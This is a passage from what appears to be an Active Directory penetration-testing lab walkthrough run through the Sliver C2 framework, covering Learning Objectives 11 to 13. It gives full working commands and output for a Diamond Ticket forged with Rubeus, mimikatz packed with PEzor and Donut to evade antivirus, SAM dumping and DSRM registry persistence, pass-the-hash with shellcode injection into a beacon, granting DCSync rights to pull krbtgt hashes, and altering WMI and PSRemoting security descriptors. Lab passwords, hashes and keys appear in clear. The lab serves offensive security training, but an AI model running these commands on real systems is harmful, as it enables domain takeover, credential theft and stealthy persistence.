doIGTTCCBkmgAwIBB[snip]

[*] Decrypting TGT


[*] Retreiving PAC
[*] Modifying PAC
[*] Signing PAC
[*] Encrypting Modified TGT

[*] base64(ticket.kirbi):
doIGZjCCBmKgAwIBBaED[snip]

[+] Ticket successfully imported!

[+] inlineExecute-Assembly Finished



We can now access any service on dcorp-dc such as CIFS, WMI, WinRM etc. with the modified TGT. In this case we access CIFS on dcorp-dc successfully as follows.
[server] sliver (dcorp-std_https) > ls '\\dcorp-dc\c$'

\\dcorp-dc\c$\ (15 items, 1.0 GiB)


==================================
drwxrwxrwx $Recycle.Bin <dir> Thu Dec 14 04:15:02 -0800 2023
drwxrwxrwx $WinREAgent <dir> Tue Jan 16 03:11:43 -0800 2024
Lrw-rw-rw- Documents and Settings -> C:\Users 0 B Thu Nov 10 21:51:26 -0800 2022
[snip]

Purge the ticket after successful access as follows.


[server] sliver (dcorp-std_https) > inline-execute-assembly -t 80 /mnt/c/AD/Tools/Rubeus.exe purge

[*] Output:
[*] Action: Purge Tickets
Luid: 0x0
[+] Tickets successfully purged!



Learning Objective 11
Use Domain Admin privileges obtained earlier to abuse the DSRM credential for persistence.

Abuse the DSRM credential for persistence


Using PEzor, and Remote-sc-*
We can persist with administrative access on the DC once we have Domain Admin privileges by abusing
the DSRM administrator credentials.

We will extract the credentials from the SAM file of dcorp-dc. The Directory Services Restore Mode
(DSRM) password is mapped to the local Administrator on the DC.

Switch to the dcorp-dc session.


[server] sliver (dcorp-std_https) > sessions -i 686345ee
[*] Active session dcorp-dc_tcp (686345ee)

Let's use PEzor in a new Ubuntu (WSL) terminal to convert mimikatz.exe into Donut shellcode with the arguments needed to dump the DSRM password from the SAM (lsadump::sam), repackaged into an x86/x64 .NET executable compatible with Sliver's execute-assembly. Be sure to rename the packaged binary afterwards so the next PEzor run does not overwrite it.
wsluser@dcorp-studentX:~$ cd /mnt/c/AD/Tools/PEzor/

wsluser@dcorp-studentX:/mnt/c/AD/Tools/PEzor$ sudo su
[sudo] password for wsluser: WSLToTh3Rescue!

root@dcorp-studentX:/mnt/c/AD/Tools/PEzor# ./PEzor.sh -unhook -antidebug -fluctuate=NA -format=dotnet -sleep=5 /mnt/c/AD/Tools/PEzor/mimikatz.exe -z 2 -p '"privilege::debug" "token::elevate" "lsadump::sam" "exit"'
---------------------------------------------------------------------------
[?] Unhook enabled
[?] Anti-debug enabled
[?] Fluctuate: NA
[?] Output format: dotnet
[?] Waiting 5 seconds before executing the payload
[?] Processing /mnt/c/AD/Tools/PEzor/mimikatz.exe
[?] PE detected: /mnt/c/AD/Tools/PEzor/mimikatz.exe: PE32+ executable (console) x86-64, for MS Windows
[?] Building .NET executable
[?] Executing donut

[ Donut shellcode generator v1 (built Jan 15 2024 02:44:21)


[ Copyright (c) 2019-2021 TheWover, Odzhan



[ Instance type : Embedded
[ Module file : "/mnt/c/AD/Tools/PEzor/mimikatz.exe"
[ Entropy : Random names + Encryption
[ Compressed : aPLib (Reduced by 55%)
[ File type : EXE
[ Parameters : "privilege::debug" "token::elevate" "lsadump::sam" "exit"
[ Target CPU : x86+amd64
[ AMSI/WDLP/ETW : continue
[ PE Headers : overwrite
[ Shellcode : "/tmp/tmp.FBP9im8QfT/shellcode.cs"
[ Exit : Thread
[!] Done! Check /mnt/c/AD/Tools/PEzor/mimikatz.exe.packed.dotnet.exe: PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows

root@dcorp-studentX:/mnt/c/AD/Tools/PEzor# mv /mnt/c/AD/Tools/PEzor/mimikatz.exe.packed.dotnet.exe /mnt/c/AD/Tools/PEzor/mimikatz-sam.exe.packed.dotnet.exe

Back in the dcorp-dc session, execute the repackaged mimikatz-sam.exe.packed.dotnet.exe assembly using execute-assembly as follows, picking a SYSTEM process from ps to use as the spoofed parent (-P).
[server] sliver (dcorp-dc_tcp) > ps

Pid Ppid Owner Arch Executable Session


====== ====== ============================== ======== =======================

[......snip.......]

8080 772 NT AUTHORITY\SYSTEM x86_64 svchost.exe 0
9620 772 NT AUTHORITY\SYSTEM x86_64 WmiApSrv.exe

[server] sliver (dcorp-dc_tcp) > execute-assembly -P 9620 -p 'c:\windows\system32\wsmprovhost.exe' -t 45 '/mnt/c/AD/Tools/PEzor/mimikatz-sam.exe.packed.dotnet.exe'

[*] Output:
[snip]

mimikatz(commandline) # lsadump::sam
Domain : DCORP-DC
SysKey : bab78acd91795c983aef0534e0db38c7
Local SID : S-1-5-21-627273635-3076012327-2140009870

SAMKey : f3a9473cb084668dcf1d7e5f47562659

RID : 000001f4 (500)


User : Administrator
Hash NTLM: a102ad5753f4c441e3af31c97fad86fd



RID : 000001f5 (501)
User : Guest

RID : 000001f7 (503)


User : DefaultAccount

RID : 000001f8 (504)


User : WDAGUtilityAccount

mimikatz(commandline) # exit
Bye!

By default the DSRM administrator is not allowed to log on to the DC over the network. So, we change the logon behaviour for the account by setting the DsrmAdminLogonBehavior value under HKLM\System\CurrentControlSet\Control\Lsa on dcorp-dc to 2 (network logon with the DSRM password is always allowed; a value of 1 would only allow it while the directory service is stopped). We can do this with Sliver's registry command.
[server] sliver (dcorp-dc_tcp) > registry write --hive HKLM --type dword "System\\CurrentControlSet\\Control\\Lsa\\DsrmAdminLogonBehavior" 2

[*] Value written to registry

We use mimikatz to pass the hash and spawn a new process as the DSRM administrator, then inject our Sliver shellcode into that process to obtain a beacon running in the DSRM administrator's security context, with admin access to dcorp-dc.

Begin by using PEzor in a new Ubuntu terminal to create a compatible .NET binary that performs the pass-the-hash as follows. Make sure to rename the file accordingly.
root@dcorp-studentX:/mnt/c/AD/Tools/PEzor# ./PEzor.sh -unhook -antidebug -fluctuate=NA -format=dotnet -sleep=5 /mnt/c/AD/Tools/PEzor/mimikatz.exe -z 2 -p '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:C:\Windows\System32\cmd.exe" "exit"'
---------------------------------------------------------------------------
[?] Unhook enabled
[?] Anti-debug enabled
[?] Fluctuate: NA
[?] Output format: dotnet
[?] Waiting 5 seconds before executing the payload
[?] Processing /mnt/c/AD/Tools/PEzor/mimikatz.exe
[?] PE detected: /mnt/c/AD/Tools/PEzor/mimikatz.exe: PE32+ executable (console) x86-64, for MS Windows
[?] Building .NET executable
[?] Executing donut

[ Donut shellcode generator v1 (built Jan 15 2024 02:44:21)


[ Copyright (c) 2019-2021 TheWover, Odzhan

[ Instance type : Embedded



[ Module file : "/mnt/c/AD/Tools/PEzor/mimikatz.exe"
[ Entropy : Random names + Encryption
[ Compressed : aPLib (Reduced by 55%)
[ File type : EXE
[ Parameters : "sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:cmd.exe" "exit"
[ Target CPU : x86+amd64
[ AMSI/WDLP/ETW : continue
[ PE Headers : overwrite
[ Shellcode : "/tmp/tmp.6bPGMWIvIo/shellcode.cs"
[ Exit : Thread
[!] Done! Check /mnt/c/AD/Tools/PEzor/mimikatz.exe.packed.dotnet.exe: PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows

root@dcorp-studentX:/mnt/c/AD/Tools/PEzor# mv /mnt/c/AD/Tools/PEzor/mimikatz.exe.packed.dotnet.exe /mnt/c/AD/Tools/PEzor/mimikatz-dsrm.exe.packed.dotnet.exe

Next, in an elevated dcorp-stdX session (obtained as shown in LO-5), perform the pass-the-hash using mimikatz-dsrm.exe.packed.dotnet.exe and make a note of the process ID it spawns.
If an elevated dcorp-stdX session isn't available, it is possible to restart the AbyssWebServer service to gain one.
[server] sliver (dcorp-std_https) > remote-sc-stop -t 45 "" AbyssWebServer
[*] Successfully executed remote-sc-stop (coff-loader)
[*] Got output:
stop_service:
hostname:
servicename: AbyssWebServer
Service is already stopped.
SUCCESS.

[server] sliver (dcorp-std_https) > remote-sc-start -t 45 "" AbyssWebServer


[*] Successfully executed remote-sc-start (coff-loader)
[*] Got output:
start_service:
hostname:
servicename: AbyssWebServer
SUCCESS.

[*] Beacon fcafe701 dcorp-std_https - 172.16.100.10:52517 (dcorp-studentX) - windows/amd64 - Mon, 19 Feb 2024 03:49:50 PST

[server] sliver (dcorp-std_https) > use fcafe701


[*] Active beacon dcorp-std_https (fcafe701-bc63-41bb-9bfe-1f14dc12b40f)

[server] sliver (dcorp-std_https) > interactive


[*] Using beacon's active C2 endpoint: https://172.16.100.10
[*] Tasked beacon dcorp-std_https (29408b04)



[*] Session f1f4c5b8 dcorp-std_https - 172.16.100.X:52523 (dcorp-studentX) - windows/amd64 - Mon, 19 Feb 2024 03:50:54 PST

[server] sliver (dcorp-std_https) > sessions -i f1f4c5b8


[*] Active session dcorp-std_https (f1f4c5b8)

[server] sliver (dcorp-std_https) > whoami


Logon ID: NT AUTHORITY\SYSTEM
[*] Current Token ID: NT AUTHORITY\SYSTEM

Perform the pass-the-hash from a SYSTEM process that is common on the host (svchost, taskhostw etc.), as follows. sekurlsa::pth patches credential material in LSASS, so it needs this elevated context.
[server] sliver (dcorp-std_https) > ps -e taskhostw

Pid Ppid Owner Arch Executable Session


====== ====== ============================== ======== ============= =========
[snip]
2328 676 NT AUTHORITY\SYSTEM x86_64 svchost.exe 0
2412 1340 NT AUTHORITY\SYSTEM x86_64 taskhostw.exe 0
5544 3716 NT AUTHORITY\SYSTEM x86_64 taskhostw.exe 0
Security Product(s): Windows Defender

[server] sliver (dcorp-std_https) > execute-assembly -P 2412 -p 'C:\Windows\System32\taskhostw.exe' -t 80 /mnt/c/AD/Tools/PEzor/mimikatz-dsrm.exe.packed.dotnet.exe

[*] Output:

mimikatz(commandline) # sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:C:\Windows\System32\cmd.exe
user : Administrator
domain : dcorp-dc
program : C:\Windows\System32\cmd.exe
impers. : no
NTLM : a102ad5753f4c441e3af31c97fad86fd
| PID 3320
| TID 4340
| LSA Process is now R/W
| LUID 0 ; 2925230 (00000000:002ca2ae)
\_ msv1_0 - data copy @ 0000022321D5F070 : OK !
\_ kerberos - data copy @ 00000223217189E8
\_ des_cbc_md4 -> null
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK



\_ des_cbc_md4 OK
\_ *Password replace @ 000002232170EA78 (32) -> null

mimikatz(commandline) # exit
Bye!

Now that pass-the-hash has spawned a new cmd.exe (PID 3320) whose logon session carries the DSRM administrator's NTLM hash, we inject our Sliver shellcode into that process to run a beacon in its security context. We can use syscalls_shinject or secinject to do so.

NOTE: Run syscalls_shinject immediately after the command above, as the spawned process exits after a short while. Retry if it fails on the first attempt.
[server] sliver (dcorp-std_https) > syscalls_shinject 3320 /mnt/c/AD/Tools/Sliver/dcorp-std_https.bin

[*] Successfully executed syscalls_shinject (coff-loader)


[*] Got output:
Shellcode injection completed successfully!

[*] Beacon f8865911 dcorp-std_https - 172.16.100.X:50703 (dcorp-studentX) - windows/amd64 - Thu, 18 Jan 2024 05:05:16 PST

Switch to the new beacon session and validate DSRM administrator rights by listing admin shares on
dcorp-dc.
[server] sliver (dcorp-std_https) > use f8865911
[*] Active beacon dcorp-std_https (f8865911-780e-4f78-9fcf-a521f0b16aa2)

[server] sliver (dcorp-std_https) > ls '\\dcorp-dc\c$'

[*] Tasked beacon dcorp-std_https (db7cbec4)

[+] dcorp-std_https completed task db7cbec4

\\dcorp-dc\c$\ (15 items, 1.0 GiB)


==================================
drwxrwxrwx $Recycle.Bin <dir> Thu Dec 14 04:15:02 -0800 2023
drwxrwxrwx $WinREAgent <dir> Tue Jan 16 03:11:43 -0800 2024
Lrw-rw-rw- Documents and Settings -> C:\Users 0 B Thu Nov 10 21:51:26 -0800 2022
[snip]



Learning Objective 12
• Check if studentX has Replication (DCSync) rights.

• If yes, execute the DCSync attack to pull hashes of the krbtgt user.

• If no, add the replication rights for the studentX and execute the DCSync attack to pull hashes of
the krbtgt user.

Check if studentX has DCSync rights


Using StandIn
Enumerating the domain object's ACL for DS-Replication-Get-Changes rights with StandIn, we find that our current user lacks them.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/StandIn.exe' --object "distinguishedname=DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL" --access --ntaccount "dcorp\studentX"

[*] Output:

[?] Using DC : dcorp-dc.dollarcorp.moneycorp.local


[?] Object : DC=dollarcorp
Path : LDAP://DC=dollarcorp,DC=moneycorp,DC=local

[+] Object properties


|_ Owner : BUILTIN\Administrators
|_ Group : BUILTIN\Administrators

[+] Object access rules

[+] Identity --> dcorp\studentX


|_ Type : Allow
|_ Permission : ReadProperty, GenericExecute
|_ Object : ANY



Add DCSync rights for studentX and execute the attack
Using StandIn and PEzor
To add DCSync rights we can use StandIn. Writing to the domain object's ACL requires Domain Admin or equivalent rights, which can be obtained with the Golden Ticket, Diamond Ticket or DSRM attacks shown in the prior sections. In this case we use the Diamond Ticket attack to impersonate a Domain Admin.
[server] sliver (dcorp-std_https) > inline-execute-assembly -t 80 /mnt/c/AD/Tools/Rubeus.exe 'diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /show /ptt'

[*] Successfully executed inline-execute-assembly (coff-loader)


[*] Got output:

[*] Action: Diamond Ticket

[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'


[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/dcorp-dc.dollarcorp.moneycorp.local'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: 8ns4pHaiEXmv8JLwplg+AyxM8h5cH6xJ4l2Su53S864=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):

doIGTTCCBkmgA[snip]

[*] Decrypting TGT


[*] Retreiving PAC
[*] Modifying PAC
[*] Signing PAC
[*] Encrypting Modified TGT

[*] base64(ticket.kirbi):

doIGZjCCBmKgAwIB[snip]

[+] Ticket successfully imported!

[+] inlineExecute-Assembly Finished



Add DCSync rights for the dcorp\studentX user using StandIn. We use the --object argument to select the domain object by its distinguishedname, --grant for the principal that receives the rights, and --type to specify the kind of rights (DCSync grants the three replication extended rights).
[server] sliver (dcorp-std_https) > inline-execute-assembly -t 80 '/mnt/c/AD/Tools/StandIn.exe' '--object "distinguishedname=DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL" --grant "dcorp\studentX" --type DCSync --domain dollarcorp.moneycorp.local'

[*] Successfully executed inline-execute-assembly (coff-loader)


[*] Got output:
[+] Success - Wrote 164501 bytes to memory
[+] Using arguments: --object "distinguishedname=DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL" --grant "dcorp\studentX" --type DCSync --domain dollarcorp.moneycorp.local

[?] Using DC : dcorp-dc.dollarcorp.moneycorp.local


[?] Object : DC=dollarcorp
Path : LDAP://DC=dollarcorp,DC=moneycorp,DC=local

[+] Object properties


|_ Owner : BUILTIN\Administrators
|_ Group : BUILTIN\Administrators

[+] Set object access rules


|_ Success, added dcsync privileges to object for dcorp\studentX

[+] inlineExecute-Assembly Finished

[server] sliver (dcorp-std_https) > inline-execute-assembly -t 80 /mnt/c/AD/Tools/Rubeus.exe purge

Test the new DCSync rights using StandIn and mimikatz-dcsync.exe.packed.dotnet.exe. The Diamond Ticket has been purged, so the following runs purely as dcorp\studentX. In the mimikatz output, privilege::debug fails because the process is not elevated; that does not matter, since DCSync is an authenticated replication request to the DC and needs only the replication rights just granted, not any local privilege.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/StandIn.exe' --object "distinguishedname=DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL" --access --ntaccount "dcorp\studentX"

⠴ Executing assembly ...


[*] Output:

[?] Using DC : dcorp-dc.dollarcorp.moneycorp.local


[?] Object : DC=dollarcorp
Path : LDAP://DC=dollarcorp,DC=moneycorp,DC=local

[+] Object properties


|_ Owner : BUILTIN\Administrators



|_ Group : BUILTIN\Administrators

[+] Object access rules

[+] Identity --> dcorp\studentX


|_ Type : Allow
|_ Permission : ReadProperty, GenericExecute
|_ Object : ANY

[+] Identity --> dcorp\studentX


|_ Type : Allow
|_ Permission : ExtendedRight
|_ Object : DS-Replication-Get-Changes

[+] Identity --> dcorp\studentX


|_ Type : Allow
|_ Permission : ExtendedRight
|_ Object : DS-Replication-Get-Changes-In-Filtered-Set

[+] Identity --> dcorp\studentX


|_ Type : Allow
|_ Permission : ExtendedRight
|_ Object : DS-Replication-Get-Changes-All

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'C:\windows\system32\taskhostw.exe' -t 180 '/mnt/c/AD/Tools/PEzor/mimikatz-dcsync.exe.packed.dotnet.exe'

[*] Output:

.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz(commandline) # lsadump::dcsync /user:dcorp\krbtgt


[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : krbtgt



** SAM ACCOUNT **

SAM Username : krbtgt


Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 9:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502

Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd

[snip]



Learning Objective 13
• Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without
requiring administrator access.

• Retrieve machine account hash from dcorp-dc without using administrator access and use that to
execute a Silver Ticket attack to get code execution with WMI.

Modify security descriptors on dcorp-dc to get access using PSRemoting and WMI
Using PS2EXE, Sharp-wmi, RACE and Stracciatella
Since it is hard to find a C# alternative/equivalent for the RACE Toolkit, an easy workaround would be to
execute PowerShell scripts using Stracciatella or to go about converting the RACE.ps1 script into an
executable script then converting it into a .NET x86-x64 assembly compatible with the execute-assembly
command. We will be considering the latter option.

• PS2EXE.ps1:
https://raw.githubusercontent.com/MScholtes/PS2EXE/master/Module/ps2exe.ps1
RACE.ps1 is a module: it only defines functions. Appending the function calls we need to the end of a copy turns that copy into an executable script (RACEEx.ps1). PS2EXE.ps1 then wraps the script in a .NET assembly, which execute-assembly can run in the same way as any other C# tool. Note that the resulting binary still hosts the PowerShell engine (System.Management.Automation.dll) inside the target process, so engine-level controls such as script block logging and AMSI inspect the embedded script just as they would in powershell.exe.

To grant dcorp\studentX access to a specific WMI namespace on dcorp-dc, RACE.ps1 provides Set-RemoteWMI, which adds the user to the DACL of the namespace and to the machine-wide DCOM launch and access permissions:
Set-RemoteWMI -SamAccountName studentX -ComputerName dcorp-dc.dollarcorp.moneycorp.local -namespace 'root\cimv2' -Verbose

To grant dcorp\studentX access to PowerShell remoting on dcorp-dc, RACE.ps1 provides Set-RemotePSRemoting, which adds the user to the DACL of the PowerShell session configuration on the target:
Set-RemotePSRemoting -SamAccountName "studentX" -ComputerName "dcorp-dc.dollarcorp.moneycorp.local" -Verbose

We create two executable scripts, RACEEx.ps1 to add the rights and RACEExRem.ps1 to remove them, by copying RACE.ps1 twice so that each copy carries all the functions it needs.
PS C:\Windows\System32> copy C:\AD\Tools\RACE.ps1 C:\AD\Tools\RACEEx.ps1
PS C:\Windows\System32> copy C:\AD\Tools\RACE.ps1 C:\AD\Tools\RACEExRem.ps1

Append the following lines (at the end) to RACEEx.ps1 to add the WMI and PSRemoting rights, and save it.

Set-RemoteWMI -SamAccountName studentX -ComputerName dcorp-dc.dollarcorp.moneycorp.local -namespace 'root\cimv2' -Verbose;
Set-RemotePSRemoting -SamAccountName studentX -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose

Similarly, append the following lines (at the end) to RACEExRem.ps1 to remove the added WMI and PSRemoting rights, and save it.
Set-RemotePSRemoting -SamAccountName studentX -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Remove -Verbose;
Set-RemoteWMI -SamAccountName studentX -ComputerName dcorp-dc.dollarcorp.moneycorp.local -namespace 'root\cimv2' -Remove -Verbose

Next, spawn an administrative PowerShell prompt and compile both scripts into .NET assemblies with PS2EXE.ps1. The -x64 switch builds a 64-bit-only binary, matching the x64 process we run it in, and -sta selects single-threaded apartment mode.
PS C:\Windows\system32> .\ps2exe.ps1 -inputFile C:\AD\Tools\RACEEx.ps1 -outputFile C:\AD\Tools\RACEEx.exe -x64 -sta

Reading input file C:\AD\Tools\RACEEx.ps1
Compiling file...
Output file C:\AD\Tools\RACEEx.exe written

PS C:\Windows\system32> .\ps2exe.ps1 -inputFile C:\AD\Tools\RACEExRem.ps1 -outputFile C:\AD\Tools\RACEExRem.exe -x64 -sta

Reading input file C:\AD\Tools\RACEExRem.ps1
Compiling file...
Output file C:\AD\Tools\RACEExRem.exe written

Usage:
.\ps2exe.ps1 [-inputFile] <file_name> [-outputFile] <file_name> [-verbose] [-debug]
-x64 = Compile for 64-bit runtime only
-sta = Single Thread Apartment Mode

It is also possible to perform this conversion with its GUI wrapper alternative called Win-PS2EXE.exe.

Finally, run RACEEx.exe with execute-assembly to add the WMI and PSRemoting rights for our student user. Modifying these security descriptors requires administrative rights on dcorp-dc, so first impersonate dcorp\svcadmin by requesting and injecting a TGT with Rubeus, and purge the ticket once the job is done.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'C:\windows\system32\taskhostw.exe' -t 80 /mnt/c/AD/Tools/Rubeus.exe 'asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /show /ptt'

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/RACEEx.exe'

[*] Output:
VERBOSE: Existing ACL for namespace root\cimv2 is O:BAG:BAD:(A;CIID;CCDCLCSWRPWPRCWD;;;BA)(A;CIID;CCDCRP;;;NS)(A;CIID;CCDCRP;;;LS)(A;CIID;CCDCRP;;;AU)
VERBOSE: Existing ACL for DCOM is O:BAG:BAD:(A;;CCDCLCSWRP;;;BA)(A;;CCDCSW;;;WD)(A;;CCDCLCSWRP;;;S-1-5-32-562)(A;;CCDCLCSWRP;;;LU)(A;;CCDCSW;;;AC)
VERBOSE: New ACL for namespace root\cimv2 is O:BAG:BAD:(A;CIID;CCDCLCSWRPWPRCWD;;;BA)(A;CIID;CCDCRP;;;NS)(A;CIID;CCDCRP;;;LS)(A;CIID;CCDCRP;;;AU)(A;CI;CCDCLCSWRPWPRCWD;;;S-1-5-21-1874506631-3219952063-538504511-52621)
VERBOSE: New ACL for DCOM O:BAG:BAD:(A;;CCDCLCSWRP;;;BA)(A;;CCDCSW;;;WD)(A;;CCDCLCSWRP;;;S-1-5-32-562)(A;;CCDCLCSWRP;;;LU)(A;;CCDCSW;;;AC)(A;;CCDCLCSWRP;;;S-1-5-21-1874506631-3219952063-538504511-52621)
ERROR: Processing data for a remote command failed with the following error message: The I/O operation has been aborted because of either a thread exit or an application request. For more information, see the about_Remote_Troubleshooting Help topic.

The new ACEs give the student's SID (the entry ending in -52621) exactly the rights Administrators hold on the root\cimv2 namespace, including WRITE_DAC (the trailing WD in the rights string), plus full DCOM launch and activation rights. The ERROR at the end comes from Set-RemotePSRemoting: applying the new session-configuration SDDL restarts WinRM on dcorp-dc, which tears down the very remote session that is applying it, so the error is expected and the change has already been written; the PSRemoting test below confirms it.

Then re-impersonate studentX and test PSRemoting access using Stracciatella as follows. You can alternatively test this from a standard PowerShell prompt.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'C:\windows\system32\taskhostw.exe' -t 80 /mnt/c/AD/Tools/Rubeus.exe 'asktgt /user:studentX /password:JPIzbuWHdSfq9NFr /show /ptt'

[*] Output:

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 8595D70A3C150218B35AB4C32A0CF3C8


[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\studentX'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIGKTCCBiWgAwIBBaE[snip]

[+] Ticket successfully imported!

ServiceName : krbtgt/dollarcorp.moneycorp.local
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : studentX
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 2/14/2024 7:34:17 AM
EndTime : 2/14/2024 5:34:17 PM
RenewTill : 2/21/2024 7:34:17 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : 2gJVuqHGi+XOzlt1YgZF8g==
ASREP (key) : 8595D70A3C150218B35AB4C32A0CF3C8

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/Stracciatella.exe' '-c "Invoke-Command -ScriptBlock {$env:username} -ComputerName dcorp-dc.dollarcorp.moneycorp.local"'

[*] Output:
studentX

Test WMI access using sharp-wmi / CIMplant.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\system32\taskhostw.exe' -t 45 '/mnt/c/AD/Tools/SharpWMI.exe' 'action=query query="select * from win32_process" computername=dcorp-dc'

[*] sharp-wmi output:


Scope: \\dcorp-dc\root\cimv2

Caption : System Idle Process


CommandLine :
CreationClassName : Win32_Process
CreationDate : 20220927200512.156248-420

CSCreationClassName : Win32_ComputerSystem
CSName : DCORP-DC
Description : System Idle Process
ExecutablePath :
ExecutionState :
Handle : 0
HandleCount : 0
InstallDate :
KernelModeTime : 394253906250
MaximumWorkingSetSize :
MinimumWorkingSetSize :
Name : System Idle Process
OSCreationClassName : Win32_OperatingSystem
[snip]

Let's execute RACEExRem.exe with execute-assembly, again as dcorp\svcadmin, to remove the WMI and PSRemoting rights we added.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'C:\windows\system32\taskhostw.exe' -t 80 /mnt/c/AD/Tools/Rubeus.exe 'asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /show /ptt'

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/RACEExRem.exe'

[*] Output:
VERBOSE: Existing ACL for namespace root\cimv2 is O:BAG:BAD:(A;CI;CCDCLCSWRPWPRCWD;;;S-1-5-21-1874506631-3219952063-538504511-52621)(A;CI;CCDCLCSWRPWPRCWD;;;S-1-5-21-1874506631-3219952063-538504511-52621)(A;CIID;CCDCLCSWRPWPRCWD;;;BA)(A;CIID;CCDCRP;;;NS)(A;CIID;CCDCRP;;;LS)(A;CIID;CCDCRP;;;AU)
VERBOSE: Existing ACL for DCOM is O:BAG:BAD:(A;;CCDCLCSWRP;;;BA)(A;;CCDCSW;;;WD)(A;;CCDCLCSWRP;;;S-1-5-32-562)(A;;CCDCLCSWRP;;;LU)(A;;CCDCSW;;;AC)(A;;CCDCLCSWRP;;;S-1-5-21-1874506631-3219952063-538504511-52621)(A;;CCDCLCSWRP;;;S-1-5-21-1874506631-3219952063-538504511-52621)
VERBOSE: Removing added entries
VERBOSE: Removing permissions for studentX from ACL for root\cimv2 namespace
VERBOSE: Removing permissions for studentX for DCOM
VERBOSE: The new ACL for namespace root\cimv2 is O:BAG:BAD:(A;CIID;CCDCLCSWRPWPRCWD;;;BA)(A;CIID;CCDCRP;;;NS)(A;CIID;CCDCRP;;;LS)(A;CIID;CCDCRP;;;AU)
VERBOSE: The new ACL for DCOM is O:BAG:BAD:(A;;CCDCLCSWRP;;;BA)(A;;CCDCSW;;;WD)(A;;CCDCLCSWRP;;;S-1-5-32-562)(A;;CCDCLCSWRP;;;LU)(A;;CCDCSW;;;AC)

The "existing" ACLs in this run list the student's ACE twice; the removal strips every entry for that SID, and the resulting namespace and DCOM ACLs match the original ones recorded before RACEEx.exe was run. Always compare the final ACL against the original rather than trusting the "Removing" messages alone.

Purge all tickets using Rubeus.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Rubeus.exe' purge

Execute a Silver Ticket attack to get code execution with WMI
Using RACE, PS2EXE, Rubeus and Sharp-WMI
